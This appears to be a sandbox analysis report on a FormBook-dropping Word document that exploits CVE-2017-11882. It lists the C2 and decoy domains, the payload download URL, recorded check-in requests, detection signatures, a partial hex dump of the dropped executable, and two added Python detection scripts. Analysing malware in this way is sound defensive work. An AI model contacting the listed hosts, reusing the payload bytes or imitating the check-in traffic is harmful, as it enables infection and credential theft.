
Windows Analysis Report Proforma invoice.doc

Overview

General Information

Sample Name: Proforma invoice.doc
Analysis ID: 491373
MD5: 5be61511dab1f4f76366f52ca8fec8b1
SHA1: 70a6dd35d6da873242e3c56ff86f000c78614a1f
SHA256: 443ffe0efb43ac5c04e23e749b2908a8e723462f409208e0f4cf35046e3b129d
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2008 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1812 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ibefrankhq4862.exe (PID: 2032 cmdline: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe MD5: 7572FBC5DE30359E833D6F382DB286FA)
      • ibefrankhq4862.exe (PID: 1320 cmdline: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe MD5: 7572FBC5DE30359E833D6F382DB286FA)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wininit.exe (PID: 2636 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
            • cmd.exe (PID: 2036 cmdline: /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}
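The configuration above lists one real C2 URL and sixty-odd decoy domains. FormBook sends the same check-in (the /if60/ path that appears in the HTTP traffic further down) to the real C2 and to the decoys, so blocking on the decoy hostnames is the wrong response: the path is the indicator that stays constant across hosts. The Python below is added here as a worked example and is not part of the report or of Joe Sandbox. It turns the extracted configuration into indicators and applies them to proxy log lines; the log format, the shortened decoy list and the four constructed requests with dummy query values are assumptions, while the first two log lines reproduce requests the report recorded.

```python
"""Turn the FormBook configuration extracted above into network indicators
and apply them to HTTP proxy log lines.

Added example for this report, not Joe Sandbox code. The configuration is
the one printed above (decoy list cut down to the entries used in the
sample log); the first two log lines reproduce requests seen in the
report, the remaining four are constructed, with made-up query values."""
import json
from urllib.parse import urlsplit

FORMBOOK_CONFIG = json.loads("""
{"C2 list": ["www.handelsbetriebposavec.com/if60/"],
 "decoy": ["babyjames.space", "lazyguysmarketing.com", "urbantennis.info",
           "asustech.net", "rm-elektrotechnik.gmbh"]}
""")

# Stage-1 payload URL from the report (host/path, no scheme).
PAYLOAD_URLS = {"fantecheo.tk/ibefrankzx.exe"}

# Constructed proxy log: "<epoch> <client> <method> <host> <uri> <status>".
SAMPLE_HTTP_LOG = """\
1632745537 192.168.2.22 GET fantecheo.tk /ibefrankzx.exe 200
1632745540 192.168.2.22 GET www.lazyguysmarketing.com /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz 200
1632745541 192.168.2.22 GET www.urbantennis.info /if60/?L0Gd9F=AAAA&fDKt=BBBB 404
1632745542 192.168.2.22 GET www.handelsbetriebposavec.com /if60/?L0Gd9F=CCCC&fDKt=DDDD 200
1632745543 192.168.2.22 GET www.asustech.net / 200
1632745544 192.168.2.22 GET www.msn.com /de-de/?ocid=iehp 200
"""


def norm_host(host):
    """Lower-case and drop a leading 'www.': the config lists bare decoy
    domains while the bot sends its check-ins to the www. form."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def c2_indicators(config):
    """Return (c2_hosts, decoy_hosts, c2_paths) from an extracted config.
    The bot sends the same check-in to the real C2 and to the decoys, so
    the URI path is the indicator that stays constant across hosts."""
    c2_hosts, paths = set(), set()
    for entry in config["C2 list"]:
        parts = urlsplit("http://" + entry)
        c2_hosts.add(norm_host(parts.hostname))
        paths.add(parts.path)
    decoys = {norm_host(d) for d in config["decoy"]}
    return c2_hosts, decoys, paths


def classify_request(host, uri, c2_hosts, decoys, paths):
    """Label one request, or return None when it matches nothing."""
    h = norm_host(host)
    path = uri.split("?", 1)[0]
    if h + path in PAYLOAD_URLS:
        return "payload-download"
    if path in paths:                     # FormBook check-in shape
        if h in c2_hosts:
            return "formbook-checkin-c2"
        if h in decoys:
            return "formbook-checkin-decoy"
        return "formbook-checkin-unknown-host"
    # A decoy host without the C2 path is ordinary browsing: not an indicator.
    return None


def scan_http_log(text, config):
    """Return [(host, verdict)] for every flagged line in the log."""
    c2_hosts, decoys, paths = c2_indicators(config)
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, _client, _method, host, uri, _status = line.split()
        verdict = classify_request(host, uri, c2_hosts, decoys, paths)
        if verdict:
            hits.append((host, verdict))
    return hits


def block_list(config):
    """Hosts worth blocking outright: the real C2 and the payload host.
    Decoys are contacted only to hide the C2; blocking them breaks other
    traffic and leaves the bot running, so alert on them instead."""
    c2_hosts, _decoys, _paths = c2_indicators(config)
    return sorted(c2_hosts | {u.split("/", 1)[0] for u in PAYLOAD_URLS})


if __name__ == "__main__":
    for host, verdict in scan_http_log(SAMPLE_HTTP_LOG, FORMBOOK_CONFIG):
        print(f"{verdict:32} {host}")
    print("block:", ", ".join(block_list(FORMBOOK_CONFIG)))
```

Run as a script it flags the payload download, two decoy check-ins and the real C2 check-in, and leaves the plain request to www.asustech.net alone even though that domain is on the decoy list; the block list contains only fantecheo.tk and the C2 host.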

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 further memory-dump matches are not shown on this page)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.ibefrankhq4862.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.ibefrankhq4862.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.ibefrankhq4862.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a39:$sqlite3step: 68 34 1C 7B E1
  • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a68:$sqlite3text: 68 38 2A 90 C5
  • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
4.2.ibefrankhq4862.exe.28bed1c.3.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, CommandLine: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, NewProcessName: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1812, ProcessCommandLine: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, ProcessId: 2032
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: C:\Windows\SysWOW64\wininit.exe, CommandLine: C:\Windows\SysWOW64\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wininit.exe, NewProcessName: C:\Windows\SysWOW64\wininit.exe, OriginalFileName: C:\Windows\SysWOW64\wininit.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\wininit.exe, ProcessId: 2636

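The four Sigma hits above come from three Sysmon event types: a network connection (EventID 3) and a file write (EventID 11) by EQNEDT32.EXE, and two process creations (EventID 1): the dropper started by the Equation Editor, and a copy of wininit.exe started by explorer.exe. The Python below is added here as an illustration and is neither Joe Sandbox's nor the Sigma project's code. It re-implements a simplified form of each rule (the published rules carry further selections and filters) and runs it over the event fields printed above plus two constructed benign events; the field names are Sysmon's, the simplifications and the benign events are assumptions.

```python
"""Plain-Python version of what the four Sigma matches listed above key on,
run over Sysmon-style event records.

Added example for this report; it is neither Joe Sandbox nor Sigma project
code, and each rule is a simplification of the published Sigma rule it is
named after (the originals carry further selections and filters). The first
four events reproduce the Data fields printed in the Sigma Overview; the
last two are constructed benign events that the rules must leave alone."""
import ntpath

EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

EVENTS = [
    # Sysmon EventID 3 (network connection), from the report.
    {"EventID": 3, "ProcessId": 1812, "Image": EQNEDT32, "Initiated": True,
     "DestinationIp": "185.239.243.112", "DestinationPort": 80},
    # Sysmon EventID 11 (file create), from the report.
    {"EventID": 11, "ProcessId": 1812, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe"},
    # Sysmon EventID 1 (process create), both from the report.
    {"EventID": 1, "ProcessId": 2032, "ParentProcessId": 1812,
     "Image": r"C:\Users\user\AppData\Roaming\ibefrankhq4862.exe", "ParentImage": EQNEDT32},
    {"EventID": 1, "ProcessId": 2636, "ParentProcessId": 1764,
     "Image": r"C:\Windows\SysWOW64\wininit.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    # Constructed benign events (not from the report).
    {"EventID": 1, "ProcessId": 404, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\wininit.exe", "ParentImage": r"C:\Windows\System32\smss.exe"},
    {"EventID": 3, "ProcessId": 3100, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Initiated": True, "DestinationIp": "192.168.2.1", "DestinationPort": 443},
]

# Core Windows processes whose parent is normally another core process in System32.
SYSTEM_PROCESSES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
                    "services.exe", "lsass.exe", "lsm.exe", "svchost.exe", "taskhost.exe"}
SYSTEM32_DIR = "c:\\windows\\system32\\"


def image_name(path):
    """Case-folded file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def rule_eqnedt32_connecting_to_internet(ev):
    return ev["EventID"] == 3 and image_name(ev["Image"]) == "eqnedt32.exe"


def rule_file_dropped_by_eqnedt32(ev):
    return ev["EventID"] == 11 and image_name(ev["Image"]) == "eqnedt32.exe"


def rule_droppers_exploiting_cve_2017_11882(ev):
    # The Equation Editor has no legitimate reason to spawn child processes.
    return ev["EventID"] == 1 and image_name(ev.get("ParentImage", "")) == "eqnedt32.exe"


def rule_windows_process_suspicious_parent_directory(ev):
    # wininit.exe and the other core processes are started out of System32 by
    # smss.exe/services.exe; a copy launched by explorer.exe (here the SysWOW64
    # one) is the pattern this report's process tree shows.
    if ev["EventID"] != 1 or image_name(ev["Image"]) not in SYSTEM_PROCESSES:
        return False
    return not ev.get("ParentImage", "").lower().startswith(SYSTEM32_DIR)


RULES = {
    "eqnedt32_connecting_to_internet": rule_eqnedt32_connecting_to_internet,
    "file_dropped_by_eqnedt32": rule_file_dropped_by_eqnedt32,
    "droppers_exploiting_cve_2017_11882": rule_droppers_exploiting_cve_2017_11882,
    "windows_process_suspicious_parent_directory": rule_windows_process_suspicious_parent_directory,
}


def evaluate(events):
    """Return [(rule_name, ProcessId)] for every rule hit, in event order."""
    return [(name, ev["ProcessId"]) for ev in events
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, pid in evaluate(EVENTS):
        print(f"{name:45} pid={pid}")
```

Note what these rules cannot see: the injection of the unpacked FormBook into explorer.exe (PID 1764) produces no process-creation event, which is why the tree above shows explorer.exe as the parent of the SysWOW64 wininit.exe. The parent-directory rule is the one that catches that step.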
Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (the configuration listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Proforma invoice.doc | ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match | File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://fantecheo.tk/ibefrankzx.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | ReversingLabs: Detection: 13%
Source: 5.2.ibefrankhq4862.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wininit.pdb | source: ibefrankhq4862.exe, 00000005.00000002.448740423.0000000000484000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb | source: ibefrankhq4862.exe, wininit.exe
Source: global traffic | DNS query: name: fantecheo.tk
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4x nop then jmp 00A4A358h
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4x nop then jmp 00A4A358h
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4x nop then jmp 00A4A358h
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 4x nop then pop edi
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.urbantennis.info
Source: C:\Windows\explorer.exe | Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe | Domain query: www.lazyguysmarketing.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.handelsbetriebposavec.com/if60/
Source: Joe Sandbox View | ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: global traffic | HTTP traffic detected: GET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1 | Host: www.lazyguysmarketing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 185.239.243.112 185.239.243.112
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 12:25:37 GMTContent-Type: application/x-msdownloadContent-Length: 863744Last-Modified: Mon, 27 Sep 2021 01:39:56 GMTConnection: keep-aliveETag: "615120ec-d2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae 13 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0b 00 00 98 01 00 00 00 00 00 66 b3 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 b3 0b 00 4f 00 00 00 00 c0 0b 00 54 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 93 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 54 94 01 00 00 c0 0b 00 00 96 01 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 2c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 b3 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 14 53 02 00 03 00 00 00 8c 02 00 06 fc 1f 04 00 18 93 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 